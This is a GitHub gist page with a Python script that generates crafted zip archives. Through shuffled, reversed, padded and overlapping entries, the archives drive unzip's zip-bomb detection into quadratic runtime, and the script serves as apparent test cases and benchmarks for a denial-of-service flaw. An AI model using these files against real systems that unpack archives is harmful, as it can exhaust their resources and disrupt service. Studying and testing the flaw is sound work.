Last active
April 20, 2025 16:47
-
-
Save maksverver/c1d3ece843e613e1a6dde47300a87593 to your computer and use it in GitHub Desktop.
Python script to generate zip files which make the zip bomb detection logic in unzip run in quadratic time
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Generates zip files that trigger quadratic runtime in unzip with zip bomb | |
# detection enabled. | |
import zlib | |
from random import shuffle, randrange | |
from struct import pack | |
def MakeBytes(data):
    """Coerce *data* to bytes, UTF-8 encoding it when given a str."""
    if isinstance(data, str):
        return data.encode('utf-8')
    assert isinstance(data, bytes)
    return data
def CreateFileHeaders(name, data, offset, extra=b'', comment=b''):
    """Build the (local file header, central directory header) pair for one
    entry stored without compression.

    The entry uses compression method 0 (stored), zeroed timestamps and
    attributes, and records *offset* as the local-header offset in the
    central directory entry.
    """
    def _as_bytes(value):
        # Local copy of the MakeBytes coercion so this block is self-contained.
        if isinstance(value, str):
            return value.encode('utf-8')
        assert isinstance(value, bytes)
        return value

    name = _as_bytes(name)
    data = _as_bytes(data)
    extra = _as_bytes(extra)
    comment = _as_bytes(comment)

    checksum = zlib.crc32(data)
    size = len(data)  # stored entry: compressed size == uncompressed size
    # Local file header, APPNOTE.TXT section 4.3.7.
    local = pack(
        '<IHHHHHIIIHH',
        0x04034b50,          # local file header signature
        10,                  # version needed to extract (1.0)
        0, 0,                # general purpose flags, compression method (stored)
        0, 0,                # last mod file time / date (zeroed)
        checksum, size, size,
        len(name), len(extra),
    ) + name + extra
    # Central directory file header, APPNOTE.TXT section 4.3.12.
    central = pack(
        '<IHHHHHHIIIHHHHHII',
        0x02014b50,          # central directory header signature
        10, 10,              # version made by / version needed to extract
        0, 0,                # flags, compression method (stored)
        0, 0,                # mod time / date (zeroed)
        checksum, size, size,
        len(name), len(extra), len(comment),
        0,                   # disk number start
        0, 0,                # internal / external file attributes
        offset,              # relative offset of the local header
    ) + name + extra + comment
    return (local, central)
def CreateEndOfCentralDirectoryRecord(entries, offset, comment=b''):
    """Build the end-of-central-directory record (APPNOTE.TXT 4.3.16).

    *entries* is the list of encoded central directory headers. Entry counts
    are clamped to the 16-bit maximum (65535) so that oversized archives
    still produce a syntactically valid record; the real counts then live in
    the zip64 record.
    """
    if isinstance(comment, str):
        comment = comment.encode('utf-8')
    assert isinstance(comment, bytes)
    entry_count = min(len(entries), 65535)  # clamp to 16-bit field
    directory_size = sum(map(len, entries))
    return pack(
        '<IHHHHIIH',
        0x06054b50,       # end-of-central-directory signature
        0, 0,             # this disk / disk where central directory starts
        entry_count,      # entries on this disk (clamped)
        entry_count,      # total entries (clamped)
        directory_size,   # size of the central directory in bytes
        offset,           # offset of start of central directory
        len(comment),
    ) + comment
def CreateZip64EndOfCentralDirectoryRecord(entries, offset):
    """Build the zip64 end-of-central-directory record (APPNOTE.TXT 4.3.14).

    Unlike the classic EOCD record, the 64-bit fields here hold the true
    entry count and central-directory size without clamping.
    """
    num_entries = len(entries)
    directory_size = sum(len(entry) for entry in entries)
    return pack(
        '<IQHHIIQQQQ',
        0x06064b50,      # zip64 EOCD signature
        44,              # size of the remainder of this record
        45, 45,          # version made by / needed to extract (4.5 = zip64)
        0, 0,            # this disk / central-directory start disk
        num_entries,     # entries on this disk
        num_entries,     # total entries
        directory_size,  # size of the central directory in bytes
        offset)          # offset of start of central directory
def CreateZip64EndOfCentralDirectoryLocator(offset):
    """Build the zip64 EOCD locator (APPNOTE.TXT 4.3.15) pointing at *offset*."""
    return pack('<IIQI',
                0x07064b50,  # zip64 EOCD locator signature
                0,           # disk holding the zip64 EOCD record
                offset,      # offset of the zip64 EOCD record
                1)           # total number of disks
def GenerateTestCase(zip_filename, num_files, padding=None, transform=None, overlap=False):
    """Write a zip archive with *num_files* empty entries to *zip_filename*.

    Args:
      zip_filename: output path, opened in binary write mode.
      padding: optional bytes written after each local file entry; creates
          gaps between entries so adjacent spans cannot be merged.
      transform: optional callable applied in place to the list of central
          directory entries before they are written (e.g. list.reverse or
          random.shuffle) — reordering is what triggers the worst-case
          runtime in unzip's zip bomb detection.
      overlap: if True, append one extra entry whose recorded local-header
          offset points at a random earlier position, making the file
          invalid and triggering zip bomb detection.

    When 65535 or more entries are written, zip64 end-of-central-directory
    records are emitted before the classic EOCD record.
    """
    with open(zip_filename, 'wb') as f:
        entries = []
        def AddFile(name, data, /, offset=None):
            # Write a local file header plus data at the current position and
            # remember the matching central directory entry for later.
            if offset is None: offset = f.tell()
            data = MakeBytes(data)
            local_header, central_header = CreateFileHeaders(name, data, offset)
            entries.append(central_header)
            f.write(local_header)
            f.write(data)
        for i in range(num_files):
            AddFile(f'{i}', '')
            if padding: f.write(padding)
        # This is important to trigger the worst case complexity.
        if transform:
            transform(entries)
        if overlap:
            # Make zip file invalid by adding an entry at the wrong offset.
            # This should trigger zip bomb detection:
            AddFile('x', '', offset=randrange(0, f.tell()))
        # Write central directory followed by end-of-central-directory record.
        central_directory_offset = f.tell()
        f.write(b''.join(entries))
        if len(entries) >= 65535:
            # Entry count exceeds the 16-bit EOCD limit: emit zip64 records.
            zip64_eocdr_offset = f.tell()
            f.write(CreateZip64EndOfCentralDirectoryRecord(entries, offset=central_directory_offset))
            f.write(CreateZip64EndOfCentralDirectoryLocator(offset=zip64_eocdr_offset))
        f.write(CreateEndOfCentralDirectoryRecord(entries, offset=central_directory_offset))
if __name__ == '__main__':
    reverse = list.reverse
    # Each case: (output filename, entry count, GenerateTestCase kwargs).
    cases = [
        # Normal zip file with no padding between files. This doesn't
        # trigger quadratic runtime because adjacent spans get merged.
        ('many-files-64k.zip', 65534, {}),
        # Invalid zip file where file entries overlap:
        ('many-files-64k-overlap.zip', 65534, {'overlap': True}),
        # Zip file with no padding between files, but with shuffled entries,
        # which triggers quadratic runtime.
        ('many-files-64k-shuffled.zip', 65534, {'transform': shuffle}),
        # Zip file with padding between files. This uses linear memory, but doesn't
        # trigger quadratic runtime because new entries are added at the end of the
        # buffer which uses exponential resizing.
        ('many-files-64k-padded.zip', 65534, {'padding': bytes(1)}),
        # Zip file with padding between files and entries in reverse, which triggers
        # worst-case behavior.
        ('many-files-64k-padded-reversed.zip', 65534,
         {'padding': bytes(1), 'transform': reverse}),
        # Same as above, but with 1 million entries.
        ('many-files-1m-padded-shuffled.zip', 10**6,
         {'padding': bytes(1), 'transform': shuffle}),
        # Same as above, but with overlap, which should trigger zip bomb detection.
        ('many-files-1m-padded-shuffled-overlap.zip', 10**6,
         {'padding': bytes(1), 'transform': shuffle, 'overlap': True}),
        # Some larger cases for benchmarking:
        ('many-files-1m-padded-reversed.zip', 1 * 10**6,
         {'padding': bytes(1), 'transform': reverse}),
        ('many-files-2m-padded-reversed.zip', 2 * 10**6,
         {'padding': bytes(1), 'transform': reverse}),
        ('many-files-3m-padded-reversed.zip', 3 * 10**6,
         {'padding': bytes(1), 'transform': reverse}),
    ]
    for filename, count, kwargs in cases:
        GenerateTestCase(filename, count, **kwargs)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment